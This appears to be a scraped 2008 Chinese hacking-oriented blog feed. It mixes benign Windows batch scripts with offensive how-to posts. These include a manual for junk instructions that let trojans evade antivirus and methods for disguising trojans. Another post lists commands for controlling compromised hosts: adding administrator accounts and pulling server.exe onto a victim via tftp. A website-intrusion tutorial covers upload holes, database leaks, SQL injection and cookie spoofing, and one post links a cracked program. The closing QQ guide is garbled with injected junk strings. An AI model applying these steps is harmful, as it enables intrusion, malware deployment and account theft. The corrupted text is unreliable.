<![CDATA[☆破誶D!μ]]> http://xuliang.bokemx.com/index.html <![CDATA[顽固文件删除工具]]> http://xuliang.bokemx.com/200873121529.html 将以下代码保存为BAT文件....把需要删除的文件拖放到BAT文件的图标上既可删除

DEL /F /A /Q \\?\%1
RD /S /Q \\?\%1

]]> xuliang 2008-7-31 21:52:00 <![CDATA[还原WINXP默认服务状态.BAT]]> http://xuliang.bokemx.com/200873121514.html sc config   ALG start= DEMAND
sc config   AppMgmt start= DEMAND
sc config   AudioSrv start= AUTO
sc config   BITS start= DEMAND
sc config   Browser start= AUTO
sc config   CiSvc start= DEMAND
sc config   ClipSrv start= DISABLED
sc config   COMSysApp start= DEMAND
sc config   CryptSvc start= AUTO
sc config   DcomLaunch start= AUTO
sc config   Dhcp start= AUTO
sc config   dmadmin start= DEMAND
sc config   dmserver start= AUTO
sc config   Dnscache start= AUTO
sc config   ERSvc start= AUTO
sc config   Eventlog start= AUTO
sc config   EventSystem start= DEMAND
sc config   FastUserSwitchingCompatibility start= DEMAND
sc config   helpsvc start= AUTO
sc config   HidServ start= DISABLED
sc config   HTTPFilter start= DEMAND
sc config   ImapiService start= DEMAND
sc config   lanmanserver start= AUTO
sc config   lanmanworkstation start= AUTO
sc config   LmHosts start= AUTO
sc config   Messenger start= DISABLED
sc config   mnmsrvc start= DEMAND
sc config   MSDTC start= DEMAND
sc config   MSIServer start= DEMAND
sc config   NetDDE start= DISABLED
sc config   NetDDEdsdm start= DISABLED
sc config   Netlogon start= DEMAND
sc config   Netman start= DEMAND
sc config   Nla start= DEMAND
sc config   NtLmSsp start= DEMAND
sc config   NtmsSvc start= DEMAND
sc config   PlugPlay start= AUTO
sc config   PolicyAgent start= AUTO
sc config   ProtectedStorage start= AUTO
sc config   RasAuto start= DEMAND
sc config   RasMan start= DEMAND
sc config   RDSessMgr start= DEMAND
sc config   RemoteAccess start= DISABLED
sc config   RemoteRegistry start= AUTO
sc config   RpcLocator start= DEMAND
sc config   RpcSs start= AUTO
sc config   RSVP start= DEMAND
sc config   SamSs start= AUTO
sc config   SCardSvr start= DEMAND
sc config   Schedule start= AUTO
sc config   seclogon start= AUTO
sc config   SENS start= AUTO
sc config   SharedAccess start= AUTO
sc config   ShellHWDetection start= AUTO
sc config   Spooler start= AUTO
sc config   srservice start= DISABLED
sc config   SSDPSRV start= DEMAND
sc config   stisvc start= DEMAND
sc config   SwPrv start= DEMAND
sc config   SysmonLog start= DEMAND
sc config   TapiSrv start= DEMAND
sc config   TermService start= DEMAND
sc config   Themes start= AUTO
sc config   TlntSvr start= DISABLED
sc config   TrkWks start= AUTO
sc config   UMWdf start= DEMAND
sc config   upnphost start= DEMAND
sc config   UPS start= DEMAND
sc config   VSS start= DEMAND
sc config   W32Time start= AUTO
sc config   WebClient start= AUTO
sc config   winmgmt start= AUTO
sc config   WmdmPmSN start= DEMAND
sc config   Wmi start= DEMAND
sc config   WmiApSrv start= DEMAND
sc config   wscsvc start= AUTO
sc config   wuauserv start= AUTO
sc config   WZCSVC start= AUTO
sc config   xmlprov start= DEMAND]]> xuliang 2008-7-31 21:51:00 <![CDATA[一键清理系统垃圾文件.bat]]> http://xuliang.bokemx.com/2008731214951.html pause
echo 正在清理系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo 清理系统垃圾完成!
echo. & pause
]]> xuliang 2008-7-31 21:49:00 <![CDATA[自动改回主页BAT]]> http://xuliang.bokemx.com/2008731214820.html http://www.wode114.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.wode114.com /f
pause]]> xuliang 2008-7-31 21:48:00 <![CDATA[冰点_还原精灵]]> http://xuliang.bokemx.com/2008731204951.html 冰点还原破解中文版
冰点还原教程(使用和删除冰点)
一、冰点的安装
1、只能安装在win2000和xp两个系统下,其它系统不支持。
2、安装时注意选择保护的硬盘……#此前在首页部分显示#
3、进入系统后软件呼出热键为 ctrl+AIt+shift+F6 也可以按住shift的同时鼠标双击任务图标打开,打

开后可设定密码,默认密码为空
4、主界面有三个选项:
(1)第一个为保护状态,即每次启动恢复所保护的硬盘。
(2)第二个为自由选项,比如系统正在被保护状态,我们选第二个选项,默认为1,这个1是指机器重新启

动后的一次为不保护状态,当机器在次重起后,自动转到保护状态,那么在重起后我们所做的操作在第二

次机器重起时就会被自动被保护起来。
(3)第三个为不还原状态,重启后冰点图表会不停的闪动红X,就是放弃了所有保护的硬盘,这时候运行冰

点安装程序可以删除冰点。
二、冰点的删除
1、按ctrl+AIt+shift+F6呼出界面,如果你没修改,密码为空,进入软件设置界面。
2、选择第三项,即放弃保护,计算机重启。
3、重启后冰点图标闪烁红x,说明冰点已经没有保护硬盘了。
4、运行冰点原程序,会出现删除选项,点击删除......  
可以保护您的硬盘免受病毒侵害,重新恢复删除或覆盖的文件,彻底清除安装失败的程序,并避免由于系

统死机带来的数据丢失等问题。只需简单的几步安装,即可安全地保护您的硬盘数据。还原精灵的安装不

会影响硬盘分区和操作系统。轻松安装、动态保护、实时瞬间恢复 

适合网吧和个人用,直接安装就可以,卸载:ctrl+AIt+shift+F6然后输入安装密码就可以,卸载后重新

启动生效,完全卸载就反安装一下
下载后直接安装,默认提供的 C D E 三个盘为保护,可以根据自己的要求来设置,启动软件 

ctrl+AIt+shift+F6 设置密码 
三个选项,第一个为保护状态 第二个为自由选项,第三个为不还原状态 
比如系统正在被保护状态,我们选第二个选项,默认为 1 这个1是指机器重新启动后的一次为不保护状态

,当机器在次重起后,自动转到保护状态,那么在重起后我们所做的操作在第二次机器重起时就会被自动

被保护起来,第三个不保护状态选择后就不用介绍了吧:) 
当你看到 冰点图表在不停的闪动 红X的时候 就是不在保护状态,这时要注意你的设置了!

下载地址:http://down.cngr.cn/200705/deepfreezn.rar

]]> xuliang 2008-7-31 20:49:00 <![CDATA[【免杀花指令编写手册】-基础篇]]> http://xuliang.bokemx.com/200824202025.html

一.花指令概念:

花指令是一堆汇编指令组成,对于程序来说,是一堆废话,加不加花指令都

不影响程序的正常运行.编写的花指令要终始保持堆栈的平衡

二.写花指令的原则:

写花指令的基本原则就是要保持堆栈的平衡.

写花指令细细品味下面一段比喻: 

我们把一段花指令比喻成一道数学运算题,把汇编指令(push pop等)比喻成加减
乘除,把寄存器或数据(eax,ebx,1等)比喻成
数字(1,2,3等),那么要保持花指令堆栈的平衡,等于保持这道数学题的结果是0 .

三.解释一些指令含意

push ebp ----把基址指针寄存器压入堆栈

pop  ebp ----把基址指针寄存器弹出堆栈


push eax ----把数据寄存器压入堆栈

pop  eax ----把数据寄存器弹出堆栈

nop      -----不执行

add esp,1-----指针寄存器加1

sub esp,1-----指针寄存器减1

inc ecx  -----计数器加1

dec ecx  -----计数器减1

sub esp,1 ----指针寄存器加1

sub esp,-1----指针寄存器加-1

jmp 入口地址----跳到程序入口地址

push 入口地址---把入口地址压入堆栈

retn      ------ 反回到入口地址,效果与jmp 入口地址一样.

mov eax,入口地址 ------把入口地址转送到数据寄存器中.  

jmp eax      ----- 跳到程序入口地址  

jb 入口地址

jnb 入口地址  ------效果和jmp 入口地址一样,直接跳到程序入口地址.

四.免杀花指令编写手册:

注:以后编写花指令,都可以参考本手册,灵活组合,快速写出自己的花指令.

*******************************************************************
push ebp

pop ebp

push eax

pop eax

push esp

pop esp

push 0

push 0

push 10  -------其中数字可以任意,注意与下面对应

push -10

nop  -----------可任意在中间添加

move edi,edi ----效果与nop一样

add esp,1  -------其中数字可以任意,注意以下面对应

add esp,-1

add esp,1  --------其中数字可以任意,注意以下面对应

sub esp,1 

inc ecx

dec ecx

sub eax, -2 ----------其中数字可任意,与inc的个数对应

inc eax

inc eax

add eax -2 ----------其中数字可任意,与inc的个数对应

inc eax

inc eax

jmp 下一个jmp地址

jmp 下一个地址

push ebp

mov ebp,esp -------可做为花指令的开头句

jmp 入口地址  ------跳到程序入口地址

与它效果一样的还有(以下三个):

push 入口地址

retn

jb  入口地址

jnb 入口地址

mov eax,入口地址

jmp eax

********************************************************************
五.分析一段简单的花指令:
push eax

push eax

nop

pop eax

pop eax

sub eax,1

inc eax

push 入口地址

retn 

]]> xuliang 2008-2-4 20:20:00 <![CDATA[3389得肉鸡后命令全集]]> http://xuliang.bokemx.com/200824201816.html net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接 
net use $">\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接 
net use h: $">\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: 
net use h: $">\\ip\c$Content$nbsp;登陆后映射对方C:到本地为H: 
net use $">\\ip\ipc$Content$nbsp;/del 删除IPC链接 
net use h: /del 删除映射对方到本地的为H:的映射 
net user 用户名 密码 /add 建立用户 
net user guest /active:yes 激活guest用户 
net user 查看有哪些用户 
net user 帐户名 查看帐户的属性 
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 
net start 查看开启了哪些服务 
net start 服务名 开启服务;(如:net start telnet, net start schedule) 
net stop 服务名 停止某服务 
net time \\目标ip 查看对方时间 
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 
net view 查看本地局域网内开启了哪些共享 
net view \\ip 查看对方局域网内开启了哪些共享 
net config 显示系统网络设置 
net logoff 断开连接的共享 
net pause 服务名 暂停某服务 
net send ip "文本信息" 向对方发信息 
net ver 局域网内正在使用的网络连接类型和信息 
net share 查看本地开启的共享 
net share ipc$Content$nbsp;开启ipc$共享 
net share ipc$Content$nbsp;/del 删除ipc$共享 
net share c$Content$nbsp;/del 删除C:共享 
net user guest 12345 用guest用户登陆后用将密码改为12345 
net password 密码 更改系统登陆密码 
netstat -a 查看开启了哪些端口,常用netstat -an 
netstat -n 查看端口的网络连接情况,常用netstat -an 
netstat -v 查看正在进行的工作 
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) 
netstat -s 查看正在使用的所有协议使用情况 
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息 
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同) 
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令 
at id号 开启已注册的某个计划任务 
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 
at id号 /delete 停止某个已注册的计划任务 
at 查看所有的计划任务 
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 
finger username @host 查看最近有哪些用户登陆 
telnet ip 端口 远和登陆服务器,默认端口为23 
open ip 连接到IP(属telnet登陆后的命令) 
telnet 在本机上直接键入telnet 将进入本机的telnet 
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 
copy c:\srv.exe $">\\ip\admin$Content$nbsp;复制本地c:\srv.exe到对方的admin下 
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: 
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface 
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 
mem 查看cpu使用情况 
attrib 文件名(目录名) 查看某文件(目录)的属性 
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性 
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间 
set 指定环境变量名称=要指派给变量的字符 设置环境变量 
set 显示当前所有的环境变量 
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 
pause 暂停批处理程序,并显示出:请按任意键继续.... 
if 在批处理程序中执行条件处理(更多说明见if命令及变量) 
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签) 
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) 
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) 
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 
echo 信息 在屏幕上显示出信息 
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 
find 文件名 查找某文件 
title 标题名字 更改CMD窗口标题名字 
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) 
print 文件名 打印文本文件 
ver 在DOS窗口下显示版本信息 
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) 
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS 
md 目录名 创建目录 
replace 源文件 要替换文件的目录 替换文件 
ren 原文件名 新文件名 重命名文件名 
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 
type 文件名 显示文本文件的内容 
more 文件名 逐屏显示输出文件 
doskey 要锁定的命令=字符 
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir= 
taskmgr 调出任务管理器 
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误 
tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe 
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? 
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示; 
regedit /e 注册表文件名 导出注册表 
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 
cacls 文件名 查看文件的访问用户权限列表 
REM 文本内容 在批处理文件中添加注解 
netsh 查看或更改本地网络配置情况 
IIS服务命令: 
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现) 
iisreset /start或stop 启动(停止)所有Internet服务 
iisreset /restart 停止然后重新启动所有Internet服务 
iisreset /status 显示所有Internet服务状态 
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务 
iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。 
FTP 命令: (后面有详细说明内容) 
ftp的命令行格式为: 
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。 
-d 使用调试方式。 
-n 限制ftp的自动登录,即不使用.netrc文件。 
-g 取消全局文件名。 
help [命令] 或 ?[命令] 查看命令说明 
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 
pwd 列出当前远端主机目录 
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 
mget [remote-files] 从远端主机接收一批文件至本地主机 
mput local-files 将本地主机中一批文件传送至远端主机 
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 
ascii 设定以ASCII方式传送文件(缺省值) 
bin 或 image 设定以二进制方式传送文件 
bell 每完成一次文件传送,报警提示 
cdup 返回上一级目录 
close 中断与远程服务器的ftp会话(与open对应) 
open host[port] 建立指定ftp服务器连接,可指定连接端口 
delete 删除远端主机中的文件 
mdelete [remote-files] 删除一批文件 
mkdir directory-name 在远端主机中建立目录 
rename [from] [to] 改变远端主机中的文件名 
rmdir directory-name 删除远端主机中的目录 
status 显示当前FTP的状态 
system 显示远端主机系统类型 
user user-name [password] [account] 重新以别的用户名登录远端主机 
open host [port] 重新建立一个新的连接 
prompt 交互提示模式 
macdef 定义宏命令 
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 
chmod 改变远端主机的文件权限 
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 
cd remote-dir 进入远程主机目录 
cdup 进入远程主机目录的父目录 
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip 
MYSQL 命令: 
mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。 
(例:mysql -h110.110.110.110 -Uroot -P123456 
注:u与root可以不用加空格,其它也一样) 
exit 退出MYSQL 
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符) 
show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作.

]]> xuliang 2008-2-4 20:18:00 <![CDATA[木马免杀方法总结篇]]> http://xuliang.bokemx.com/200824201620.html 一.入口点加1免杀法:
1.用到工具PEditor
2.特点:非常简单实用,但有时还会被卡巴查杀
3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可

二.变化入口地址免杀法:
1.用到工具:OllyDbg,PEditor
2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.
3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.

三.加花指令法免杀法:
1.用到工具:OllyDbg,PEditor
2.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀.
3.操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.

四.加壳或加伪装壳免杀法:
1.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等.
2.特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀
3.操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳

五.打乱壳的头文件或壳中加花免杀法:
1.用到工具:秘密行动 ,UPX加壳工具.
2.特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好
3.操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果.

六.修改文件特征码免杀法:
1.用到工具:特征码定位器,OllyDbg
2.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好

操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程]]> xuliang 2008-2-4 20:16:00 <![CDATA[常用网站入侵手法讲座]]> http://xuliang.bokemx.com/20082419514.html 首先介绍下什么样的站点可以入侵:必须是动态的网站 比如 asp php jsp 这种形式的站点 后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0) 入侵介绍: 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗 1:上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。 怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL 工具介绍:上传工具 老兵的上传工具 DOMAIN3.5 这两个软件都可以达到上传的目的 用NC也可以提交
WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马)我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。
2。暴库:这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 我门就可以把com/dispbbs中间的/换成%5c 如果有漏洞直接得到数据库的绝对路径 用寻雷什么的下载下来就可以了 还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)
为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把。ASP换成。MDB 这样就可以下载了如果还下载不了可能作了防下载。
­
3。注入漏洞:这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。
怎样利用:我先介绍下怎样找漏洞比如这个网址 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞,知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多(NBSI NDSI 啊D DOMAIN等)都可以用来猜解帐号密码,因为是菜鸟接触,我还是建议大家用工具,手工比较烦琐。
4。旁注:我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。打个形象的比喻, 比如你和我一个楼 我家很安全,而你家呢 却漏洞百出 现在有个贼想入侵我家 他对我家做了监视(也就是扫描)发现没有什么可以利用的东西 那么这个贼发现你家和我家一个楼 你家很容易就进去了 他可以先进入你家 然后通过你家得到整个楼的钥匙(系统权限) 这样就自然得到我的钥匙了 就可以进入我的家(网站)
工具介绍:还是名小子的DOMIAN3.5不错的东西 ,可以检测注入 可以旁注 还可以上传!
5.COOKIE诈骗:许多人不知道什么是COOKIE,COOKIE是你上网时由网站所为你发送的值记录了你的一些资料,比如IP,姓名什么的。
怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了 但是破解 不出来密码 (MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
今天的介绍就到这里了 比较基础,都是概念性的东西,所有的都是我的个人理解,如有不正确的地方希望大家指出(个人认为就是 为什么换成%5c 这里有点问题)。
]]> xuliang 2008-2-4 19:51:00 <![CDATA[菜鸟QQ防黑大全]]> http://xuliang.bokemx.com/200824194754.html 它在[url=javascript:;]网络[/url]的特殊地位,受到越来越多的[url=javascript:;]黑客[/url]的关注,也越来越多的菜鸟们QQ频频被盗,实在冒火。下面我就将我在QQ防黑方面的经验和一些很有用的小点子拿来给菜鸟们分享,希望能对广大的菜鸟们有所帮助
常见QQ攻击方法:
;Ivhv4H*x/wg01、暴力破解黑客X档案官方站L\Z oJ*f
用暴力破解 好的密码词典来对本地的QQ密码文件或在线QQ配合好的密码词典进行暴力破解。黑客X档案官方站7kT+Sv l"Pp| mO'A
黑客X档案官方站Q6I {1Psd8RB
2、专门的破解工具
t+Vk2qt0这类软件一种是直接破解出曾经选择过“下次登录不显示登录框”的本地QQ号
"v1o%Z:b;T2A |0的最后一次的密码,一种是使用了叫做“隐身穿墙术”的QQ黑软,通过一个独立的执行文件调用QQ主程序,跳过密码验证直接登录QQ。
1nS5w0~L:Hr Z0黑客X档案官方站b6f?Nh y
3、使用木马程序
vLB3sXn6L4bz7?0通过诱骗目标去浏览藏有QQ木马的网页,让木马自动下载并运行,或向目标发送绑捆了木马的软件、图片等文件让其执行。木马通过获取QQ登录窗口密码或记录击键记录盗取密码,并发向指定Email或保存在计算机的指定位置。
5f XZ*T0Z|y~|eu0黑客X档案官方站e m.Hv4w t.A[
4、破解注册QQ密码保护登记的Emai密码黑客X档案官方站)~/{Z'[(KW
通过破解目标注册QQ密码保护邮箱的密码来获得你的QQ密码。黑客X档案官方站2]8D%h0fS&_ ID
­
:w(E3Ij\:Z05、利用QQ软件本身的漏洞黑客X档案官方站0Zd[8Sy)a9o b@
利用QQ软件本身的漏洞来向目标发送攻击信息,使其被迫下线或造成QQ程序错误退出。
z[ C {&] bx G/T0
(N$[OI ZR0防范措施:黑客X档案官方站$]'SS7c#X
一、最最基本的防范:一定要申请密码保护。(千万不要亡羊补牢哦)黑客X档案官方站 [9`^(auFiPy V
二、针锋相对的防范:
[7SG"JbU01、对于暴力破解:黑客X档案官方站lDEvT/]&e e9yz
①一个复杂的密码是关键,8位以上的数字 大小写字母 符号,这样的设置是对暴力破解者耐心的一个挑战,要是在线破解这也将是对其经济实力的挑战。
+R a+S3g"K/F\/_-J0②下线后删除保存有你QQ号码记录的文件夹,防止本地密码文件的破解。
*J9]:M F3k0c0③登录QQ时可以在号码前加很多的0登录,这样可以躲过qqdreams等一类的在线破解软件对你的QQ号的探测。
*q%T(C h(g-C:i0④使用QQ代理,不轻易和对方进行“二人世界”聊天以隐藏自己的真实ip,避免在线破解。黑客X档案官方站 a LF6dRHOQ
2、对于专门的破解软件:黑客X档案官方站T'Nt PT-@|W'oJy
①下线后删除保存有你QQ号码记录的文件夹。黑客X档案官方站S^l)z)A$h a(ts
②登录QQ时不要选择保存密码。黑客X档案官方站D P"z-Fy
③在QQ所在的文件夹下,删除子文件夹中的OICQ2000.cfg文件,这样下次启动QQ将只能使用“注册向导登录”,这将使“隐身穿墙术”失效。黑客X档案官方站"`#SR0pLC)ZKj4{
3、对于木马:黑客X档案官方站%dh-owC
